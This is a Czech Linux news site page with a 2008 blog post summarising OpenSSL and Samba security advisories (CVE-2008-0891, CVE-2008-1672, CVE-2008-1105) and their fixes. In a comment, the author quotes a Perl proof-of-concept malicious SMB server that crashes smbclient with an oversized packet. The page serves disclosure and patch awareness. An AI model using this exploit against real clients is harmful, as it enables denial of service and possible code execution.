abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
Přihlášení | Registrace
×
itbiz logo Píšeme jinde
napište » Zprávičky
Nové video od Free Software Foundation (FSF): The University of Costumed Heroes
8.8. 15:55 | Komunita

Free Software Foundation (FSF, Nadace pro svobodný software) publikovala nové video s názvem The University of Costumed Heroes. Jedná se o součást kampaně za používání svobodného softwaru při distanční výuce.

Ladislav Hagara | Komentářů: 29
Pocket Popcorn Computer (Pocket P.C.) je open source
7.8. 13:33 | Zajímavý projekt

Vývojáři přenosného počítače Pocket Popcorn Computer (Pocket P.C.) (zprávička) informují na svém blogu, že návrh hardwaru zveřejnili na GitHubu pod licencí CC BY-SA 3.0 US.

Ladislav Hagara | Komentářů: 9
David Revoy: Kubuntu 20.04 na grafické pracovní stanici
7.8. 08:00 | Zajímavý článek

David Revoy, autor mj. komiksu Pepper&Carrot, zveřejnil novou iteraci své instalační příručky pro použití Kubuntu, nyní 20.04, jako grafické pracovní stanice.

Fluttershy, yay! | Komentářů: 5
Zveřejnění 20 GB citlivých dat z Intelu
7.8. 02:00 | IT novinky

Počátkem roku někdo odcizil z Intelu několik GB citlivých dat. Prvních 20 GB bylo zveřejněno [Hacker News, ZDNet].

Ladislav Hagara | Komentářů: 12
Ubuntu 20.04.1 LTS, Ubuntu od 2004 do 20.04 LTS
6.8. 19:33 | Nová verze

Bylo vydáno Ubuntu 20.04.1 LTS, tj. první opravné vydání Ubuntu 20.04 LTS s kódovým názvem Focal Fossa. Přehled novinek v poznámkách k vydání a v přehledu změn. Součástí oznámení je infografika Ubuntu od 2004 do 20.04 LTS (png).

Ladislav Hagara | Komentářů: 0
Konference Flock 2020 online
6.8. 18:00 | Pozvánky

MojeFedora.cz upozorňuje na letošní Flock aneb letošní online konferenci zaměřenou na přispěvatele do Fedory. Konference probíhá od zítra 7. srpna do neděle 9. srpna, viz program.

Ladislav Hagara | Komentářů: 0
Glibc 2.32
6.8. 15:00 | Nová verze

Po půl roce od vydání verze 2.31 byla vydána verze 2.32 knihovny glibc (GNU C Library). Přehled novinek v poznámkách k vydání.

Ladislav Hagara | Komentářů: 1
Black Hat USA 2020 a DEF CON 28
6.8. 09:33 | IT novinky

Dnes končí bezpečnostní konference Black Hat USA 2020 (Twitter) a začíná bezpečnostní konference DEF CON 28 (Twitter). Kvůli onemocnění COVID-19 ne v Las Vegas, ale pouze virtuálně. Na konferenci DEF CON naplánované přednášky jsou již k dispozici na DEF CON Media Serveru a na YouTube.

Ladislav Hagara | Komentářů: 2
Pinta 1.7
6.8. 07:33 | Nová verze

Po více než pěti letech byla vydána nová verze 1.7 multiplatformního grafického editoru Pinta (Wikipedie). Přehled novinek v poznámkách k vydání.

Ladislav Hagara | Komentářů: 0
Geoffrey Knauth novým prezidentem Free Software Foundation
6.8. 00:33 | Komunita

V září loňského roku Richard Stallman rezignoval na funkci prezidenta Free Software Foundation (FSF). Včera byl zvolen nový prezident. Je jím Geoffrey Knauth (Twitter).

Ladislav Hagara | Komentářů: 12
Centrum | Napsat | Starší
navrhněte » Anketa
Dokážete si představit, že by váš hlavní počítač (desktop, notebook) byl v současné době založen na architektuře jiné než x86 (x86_64)? Například ARM, POWER, RISC-V,…
 (11%)
 (12%)
 (56%)
 (14%)
 (5%)
Celkem 201 hlasů
 Komentářů: 13, poslední 7.8. 10:04
Rozcestník
AbcLinuxu
HDmag.cz
Ladislav Hagara - Ride the Raven
Ride the Raven to gaze the sorcery world, where you can summon, cast and dispel spells and scribe grimoires in your codex.
Aktuální zápisy
?Přístup k archivovaným zápisům za jednotlivé měsíce. Archív

?Seznam mých oblíbených stránek, které pravidelně navštěvuji. Oblíbené stránky
?Poslední screenshot mého desktopu. Současný desktop
AbcLinuxu a YouTube v Browsh
?Přístup na osobní hlavní stranu a na hlavní stranu všech blogů. Navigace
Nej blogů na AbcLinuxu
Nejčtenější za poslední měsíc Nejkomentovanější za poslední měsíc
AbcLinuxu:/ Blogy / Ride the Raven / GNU/Linux / OpenSSL a Samba / bezpečnostní problémy
Štítky: aktualizace, bug, C, programování, Samba, server

OpenSSL a Samba / bezpečnostní problémy

28.5.2008 18:35 | Přečteno: 1955× | GNU/Linux | poslední úprava: 29.5.2008 17:57


Dnes byly zveřejněny bezpečnostní problémy v OpenSSL SecurityFocus bid 29405 a Sambě SecurityFocus bid 29404. Nová verze OpenSSL 0.9.8h opravuje dva bezpečnostní problémy. Jde o CVE-2008-0891 a CVE-2008-1672. Pokud byla knihovna OpenSSL přeložena s rozšířením "TLS server name" (implicitně vypnuto), může útočník na dálku shodit serverovou službu využívající této knihovny. Druhý problém může být pro změnu zneužít obráceně. Klientská aplikace může být shozena (crash) zákeřným serverem při navazování šifrované komunikace.

Ukázky shození openssl jak klienta (openssl s_client ...), tak i serveru (openssl s_server ...), například na CERT-FI.

Samba dnes také nebyla ušetřena. V oznámení na stránce Secunia.com se píše o přetečení (Buffer Overflow) ve funkci receive_smb_raw() v souboru lib/util_sock.c. Problém byl vývojářům Samby oznámen 15. května a dnes 28. května byl oficiálně zveřejněn. Jedná se o bezpečnostní problém CVE-2008-1105.

V případě, že lze klientskou část obelstít a přinutit ji k navázání spojení se zákeřným serverem, například pouhým kliknutím na odkaz "smb://" nebo zasláním speciálně upraveného datového bloku nmbd serveru, lze ji také (i když zatím pouze teoreticky) přinutit spustit libovolný kód.

Poněvadž serverová část, speciálně proces smbd, může být současně klientem, týká se tento bezpečnostní problém také Samba serveru.

V linuxových distribucích se postupně objevují bezpečnostní aktualizace.
Například RedHat Bug 446724 a bezpečnostní oznámení RHSA-2008-0288 a RHSA-2008-0290.

K dispozici je už také nová verze Samby 3.0.30.

       

Hodnocení: 100 %

        špatnédobré        

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

Komentáře

Nástroje: Začni sledovat (0) ?Zašle upozornění na váš email při vložení nového komentáře. , Tisk

Vložit další komentář

2.6.2008 12:46 Ladislav Hagara | skóre: 92 | blog: Ride the Raven
Rozbalit Rozbalit vše Re: OpenSSL a Samba / bezpečnostní problémy
Bugtraq ID 29404 (SAMBA) zmiňuje následující POC (Proof Of Concept).
#!/usr/bin/perl
# 06/01/2008 - k`sOSe
#
# ~ # smbclient //localhost/w00t
# *** glibc detected *** smbclient: free(): invalid next size (fast): 0x0823c2d8 ***
#

use warnings;
use strict;
use IO::Socket;


my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '445', Listen => 1, Reuse => 1) || die($!);

while(my $csock = $sock->accept())
{
	print $csock	"\x00" .
			"\x01\xff\xff" .
			"\x41" x 131071;
			
}
Píšeme jinde
ISSN 1214-1267   www.czech-server.cz
Redakce | Inzerce | Podmínky použití | Osobní údaje
© 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.